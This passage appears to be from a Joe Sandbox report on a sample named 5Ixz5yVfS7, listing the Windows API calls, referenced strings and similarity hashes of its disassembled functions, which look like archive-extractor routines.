                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  • Opcode ID: 29262b01eebcac080a6fba828eb13a1541b04121c11b3f2696444e1e156064dd
                  • Instruction ID: 2a20fd96f8140b541c316421c486c77000d7fbaec99bbaa8b6ad4e791faef6b4
                  • Opcode Fuzzy Hash: 29262b01eebcac080a6fba828eb13a1541b04121c11b3f2696444e1e156064dd
                  • Instruction Fuzzy Hash: F3E04F718007459ECB30AF74980EF46BEE47B14704B00C81DE4D6E3590D6F4D5448B50
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 63808fa3c2f10fe63b22c7becc2841ce3b8b2da61e476aca90e3b0369af3cbfe
                  • Instruction ID: c8c4e0eceaa718072ad565363abc893598f9ee567c0cf1076efd189f25a82bc0
                  • Opcode Fuzzy Hash: 63808fa3c2f10fe63b22c7becc2841ce3b8b2da61e476aca90e3b0369af3cbfe
                  • Instruction Fuzzy Hash: 49417132A002049FDB14DF78D985AAEBBA9FFC9714B1545A9E515EB341DB31EE01CB80
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 005BB619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BB63C
                    • Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005BB662
                  • _free.LIBCMT ref: 005BB675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005BB684
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: adfb12a3231a4db4b1211af6292f580cc44532448a6b44b202068701005e5ed6
                  • Instruction ID: 779b9af5dd15f1d6726844a10dcb522688fdcc0da45810f58e93afc758115b69
                  • Opcode Fuzzy Hash: adfb12a3231a4db4b1211af6292f580cc44532448a6b44b202068701005e5ed6
                  • Instruction Fuzzy Hash: 8D017172602615BF77211A776C8DCFB6E6DFAC6BA03154229BD04C2150EFE1AD01D1B0
                  APIs
                    • Part of subcall function 005A0A41: ResetEvent.KERNEL32(?), ref: 005A0A53
                    • Part of subcall function 005A0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005A0A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 005A078F
                  • CloseHandle.KERNEL32(?,?), ref: 005A07A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 005A07C2
                  • CloseHandle.KERNEL32(?), ref: 005A07CE
                  • CloseHandle.KERNEL32(?), ref: 005A07DA
                    • Part of subcall function 005A084E: WaitForSingleObject.KERNEL32(?,000000FF,005A0A78,?), ref: 005A0854
                    • Part of subcall function 005A084E: GetLastError.KERNEL32(?), ref: 005A0860
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  • Opcode ID: dce78170768de1e73ffcf2ba0c1a2027548233a0bc725653bba2d4392f3543d3
                  • Instruction ID: 31b8e8509ff53be38607f5f43985feb7c34abbbbd0b8dda6f8459eb6c171714c
                  • Opcode Fuzzy Hash: dce78170768de1e73ffcf2ba0c1a2027548233a0bc725653bba2d4392f3543d3
                  • Instruction Fuzzy Hash: CF01B572440B08EFC7229B65DC88FCABFE9FB4A710F004519F15A521A1CB766A48DBA0
                  APIs
                  • _free.LIBCMT ref: 005BBF28
                    • Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
                    • Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506
                  • _free.LIBCMT ref: 005BBF3A
                  • _free.LIBCMT ref: 005BBF4C
                  • _free.LIBCMT ref: 005BBF5E
                  • _free.LIBCMT ref: 005BBF70
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: ffaef60ab0c75eea7f6bc2543891eaee6812a8560fd4d7c75323ee7960582d07
                  • Instruction ID: 7f7ec265b52a3ed6e2b527b92d48f95e5d076423fe05261de7b7f793dcb0773a
                  • Opcode Fuzzy Hash: ffaef60ab0c75eea7f6bc2543891eaee6812a8560fd4d7c75323ee7960582d07
                  • Instruction Fuzzy Hash: 35F06272504601AB9A20EB64EECBCB67BDDBA403103644809F00AD7910CBB0FC81CB50
                  APIs
                  • __EH_prolog.LIBCMT ref: 00597579
                    • Part of subcall function 00593B3D: __EH_prolog.LIBCMT ref: 00593B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00597640
                    • Part of subcall function 00597BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00597C04
                    • Part of subcall function 00597BF5: GetLastError.KERNEL32 ref: 00597C4A
                    • Part of subcall function 00597BF5: CloseHandle.KERNEL32(?), ref: 00597C59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  • Opcode ID: 4d6e4b338f2f2c43213c34ee4c4f0f67b593f00318b0b2cc2412f723f15cdd86
                  • Instruction ID: cee9103edc117adf3bf136b1ea435341a08564253c27a797becdf983e1a168c0
                  • Opcode Fuzzy Hash: 4d6e4b338f2f2c43213c34ee4c4f0f67b593f00318b0b2cc2412f723f15cdd86
                  • Instruction Fuzzy Hash: 8E31B07191420EAEDF20EBA8DC49BEE7FB9FF99344F04405AF444A7182DB705A48CB61
                  APIs
                    • Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                    • Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  • EndDialog.USER32(?,00000001), ref: 005AA4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 005AA4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 005AA4E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  • Opcode ID: aa7249a300d02419a32a4dbc9c1c8774ca0b7bf3490d69bc8b24f55894bad123
                  • Instruction ID: 274dab90a95c14b6095d021134774e24b7ad7f3d28d25e0263d4accd61810f38
                  • Opcode Fuzzy Hash: aa7249a300d02419a32a4dbc9c1c8774ca0b7bf3490d69bc8b24f55894bad123
                  • Instruction Fuzzy Hash: 0511D072240211AFDE219FA89C0DF7A7FA9FB9F300F140415F240DB1A2C7A69D05E726
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  • Opcode ID: 35af7ed823a0573056b9749ecafc9ca911f92a314e43990e7f711604c2b6eaa9
                  • Instruction ID: 88c7783864de61a52b24e0d201603a25a56ea2cb532a5e82b3edfa2432042e98
                  • Opcode Fuzzy Hash: 35af7ed823a0573056b9749ecafc9ca911f92a314e43990e7f711604c2b6eaa9
                  • Instruction Fuzzy Hash: 85216A76440209AEEF21DFA4CC46FEE7FB8BF05300F044526FA15961A2E371EA55DB61
                  APIs
                  • _swprintf.LIBCMT ref: 0059B51E
                    • Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D
                  • _wcschr.LIBVCRUNTIME ref: 0059B53C
                  • _wcschr.LIBVCRUNTIME ref: 0059B54C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  • Opcode ID: 474e753d602dd186c1a6b6a510bba18a06362325723776ecd019ad44f9b122d7
                  • Instruction ID: 899061d5132673a69a4c30bff1294d0b7a9d50aa7c8b922dd9510f463a4eab16
                  • Opcode Fuzzy Hash: 474e753d602dd186c1a6b6a510bba18a06362325723776ecd019ad44f9b122d7
                  • Instruction Fuzzy Hash: 5601DB73504312AABF305B65ADCADABBFACFED53607558416F845C6081FB20D940C6A1
                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0059ABC5,00000008,?,00000000,?,0059CB88,?,00000000), ref: 005A06F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0059ABC5,00000008,?,00000000,?,0059CB88,?,00000000), ref: 005A06FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0059ABC5,00000008,?,00000000,?,0059CB88,?,00000000), ref: 005A070D
                  Strings
                  • Thread pool initialization failed., xrefs: 005A0725
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  • Opcode ID: cf1aa3687ee6b5798cd171983cd42ceba1600dddb141d2fd9281ee9045e8541b
                  • Instruction ID: d1af530771bc09c05cede6769858f36d7d01d3dc36c9dbf8d36036a4099e2a99
                  • Opcode Fuzzy Hash: cf1aa3687ee6b5798cd171983cd42ceba1600dddb141d2fd9281ee9045e8541b
                  • Instruction Fuzzy Hash: C91170B1500709AFC3315F65D888AABFFECFBA9754F10482EF1DA83240D6716984CB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  • Opcode ID: 1127ec5461833de978f4c6eced9abaab59dad313e87b20a10d5b85a4899d3f50
                  • Instruction ID: 00079f3fdd75597ae8244b128afdf705ed31a1961660ebfc55e49d3c03a58184
                  • Opcode Fuzzy Hash: 1127ec5461833de978f4c6eced9abaab59dad313e87b20a10d5b85a4899d3f50
                  • Instruction Fuzzy Hash: 74018071501249AFDF219F58ED44F6A3FA9F72A384B000827F506D2630C6B19C58FBB1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                  • Instruction ID: dca46b38b7aaf054f8ad8323ace5d2d39504c3657960a55277faf005a9ec8dd4
                  • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                  • Instruction Fuzzy Hash: D7A15671900786AFDB21CF68C8927FEBFE5FF56310F18456DE6859B282C238A942C750
                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,005980B7,?,?,?), ref: 0059A351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,005980B7,?,?), ref: 0059A395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,005980B7,?,?,?,?,?,?,?,?), ref: 0059A416
                  • CloseHandle.KERNEL32(?,?,00000000,?,005980B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0059A41D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  • Opcode ID: 0a7c1893cb855cad2165704cc63a413449d2566190f18c3668c77a69b9eb0981
                  • Instruction ID: 75d2dd78c8cf6568de785f12ecdbd86f1bc43a9f736fd43d41b1400b26f37cf5
                  • Opcode Fuzzy Hash: 0a7c1893cb855cad2165704cc63a413449d2566190f18c3668c77a69b9eb0981
                  • Instruction Fuzzy Hash: 7541CC31248385AAEB21DF24DC49FAEBBE8BB91700F140D1DB5D093181D6689A48DBA3
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,005B89AD,?,00000000,?,00000001,?,?,00000001,005B89AD,?), ref: 005BC0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005BC16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,005B67E2,?), ref: 005BC181
                  • __freea.LIBCMT ref: 005BC18A
                    • Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: f1f83eb858376e2261e036ba151551c7eab3da3e2be3352baa9592d501015aec
                  • Instruction ID: 9cefd1b229de38d833b413406e212fb39d65ffc8b804db5db1fbbaceefaa9188
                  • Opcode Fuzzy Hash: f1f83eb858376e2261e036ba151551c7eab3da3e2be3352baa9592d501015aec
                  • Instruction Fuzzy Hash: 8131BC72A0020AAFDB249F69DC45DEE7FA9FB40710F144168FC15E6251EB35ED54CBA0
                  APIs
                  • GetDC.USER32(00000000), ref: 005A9DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 005A9DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005A9DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 005A9DE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: faede2aea9d881b5e3e9c2f29171b0a8337529186d62e6eca2c8c866e88e8993
                  • Instruction ID: 39899fd8bc0f5f40c78270fbd99c4bad5c8bfee90d85a4c7ed368efd1be1276c
                  • Opcode Fuzzy Hash: faede2aea9d881b5e3e9c2f29171b0a8337529186d62e6eca2c8c866e88e8993
                  • Instruction Fuzzy Hash: A4E0EC72986621A7D7601BA5AC0DBAF3F58EB29712F05000AF605D6190DE784449EB94
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 005B2016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 005B201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 005B2020
                    • Part of subcall function 005B310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 005B311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 005B2035
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction ID: e27edabb4e27910c902491c8fe5f0ab47181088705d063c217ef9f799b15ec44
                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction Fuzzy Hash: 0AC04C2400464BD41E117ABA210E1FD1F443CE27C4FD225C6E88037103DE06360ADA32
                  APIs
                    • Part of subcall function 005A9DF1: GetDC.USER32(00000000), ref: 005A9DF5
                    • Part of subcall function 005A9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 005A9E00
